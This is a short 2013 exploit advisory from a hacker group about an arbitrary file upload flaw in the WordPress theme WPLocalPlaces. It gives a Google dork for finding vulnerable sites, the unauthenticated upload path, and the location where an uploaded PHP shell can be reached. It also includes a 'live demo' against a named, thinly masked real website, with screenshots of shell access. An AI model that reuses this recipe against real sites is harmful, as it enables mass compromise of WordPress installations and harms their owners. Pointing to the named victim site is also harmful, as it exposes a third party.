Home / exploits Wordpress Themes WPLocalPlaces Upload Vulnerability
Posted on 22 October 2013
___________.__ _________ _________ \__ ___/| |__ ____ \_ ___ \______ ______ _ ________ \_ ___ \______ ______ _ __ | | | | \_/ __ / |_ __ / _ / / / ___/ / |_ __ / __ / / / | | | Y ___/ \___| | ( <_> ) /\___ \___| | | ___/ / |____| |___| /\___ > \______ /__| \____/ /\_//____ > \______ /__| \___ >/\_/ / / / / / / INDO-PENDENT HACKER http://thecrowscrew.org ### Exploit Title : Wordpress Themes WPLocalPlaces Upload Vulnerability Google Dork : inurl:"/wp-content/plugins/spotlightyour/" Locations : Banjarmasin, Indonesia Author : ovanIsmycode Contact : ovanismycode@yahoo.com Software Link : http://freelancewp.com/wordpress-theme/wp-local-places/ ### [+] POC Exp. Target : - http://domain.com/wp-content/themes/WPLocalPlaces/ Exploit : - /monetize/upload/index.php Shell Access : - http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php Ending : - Fraksi Bijoug a.k.a Kalam Saheru Saparatoss Blank Blank awkwkwkwk :v [+]Demo Live Target : http://southbaXopros.com/wp-content/themes/WPLocalPlaces/monetize/upload/index.php see it http://i.imgur.com/3NsmWdt.jpg Shell Access : http://southbayXtopros.com/wp-content/uploads/2013/10/13820893341435692459.php see it http://i.imgur.com/4e8hHzA.jpg ### Spec!4L th4nk'5 to : MsconfiX, Catalyst71, Gabby, din_muh, don_ojan, DendyIsMe, kit4r0, 777r, ph_ovtl4w, adecakep7, penjamoen, N035, -=[The Crows Crew]=-, Indonesian Hacker thecrowscrew.org, hacker-newbie.org, yogyacarderlink.web.id, devilzc0de.org ######################################## [end] ####################################################
